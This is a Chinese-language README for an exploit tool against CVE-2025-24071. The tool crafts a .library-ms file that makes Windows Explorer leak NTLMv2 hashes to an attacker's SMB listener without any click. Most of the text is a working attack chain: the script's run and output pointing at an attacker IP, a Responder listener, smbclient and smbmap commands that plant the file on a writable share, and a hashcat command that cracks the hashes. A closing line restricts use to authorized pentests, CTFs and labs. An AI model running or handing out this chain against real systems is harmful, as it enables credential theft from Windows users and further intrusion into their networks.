CVE-2025-24071 — .library-ms NTLM 强制认证(SMB / TAR 方法)
程序会询问你的攻击 IP和文件名,生成一个指向
\\<IP>\share 的 .library-ms 文件,并将其打包进 exploit.tar。当资源管理器浏览
散放的 .library-ms 文件所在的文件夹时,它会自动解析该 UNC 路径,并将该账户的
NTLMv2 哈希泄露到你的监听器——无需任何点击。
⚠️ 触发的是散放的
.library-ms文件——而不是.tar。 放在共享上的.tar文件是惰性的;资源管理器不会解析 tar 包。你必须将.library-ms本身作为散放文件 放到共享上。具体如何操作取决于所使用的工具(见下文)。
uv run coerce_library.py # or: python3 coerce_library.py
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms -> \\10.10.14.197\share
[+] packed into exploit.tar
sudo responder -I tun0
.library-ms 放到可写共享上smbclient — 上传 .tar,然后在服务端用 tar x 解压(会在旁边释放出散放的
.library-ms):
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'
smbmap — 没有解压步骤,因此直接上传散放的 .library-ms
(在此上传 .tar 没有任何作用——它无法解包):
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'
确认它已作为散放文件落在共享上:
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
☧ 仅限授权渗透测试 / CTF / 实验室使用 ☧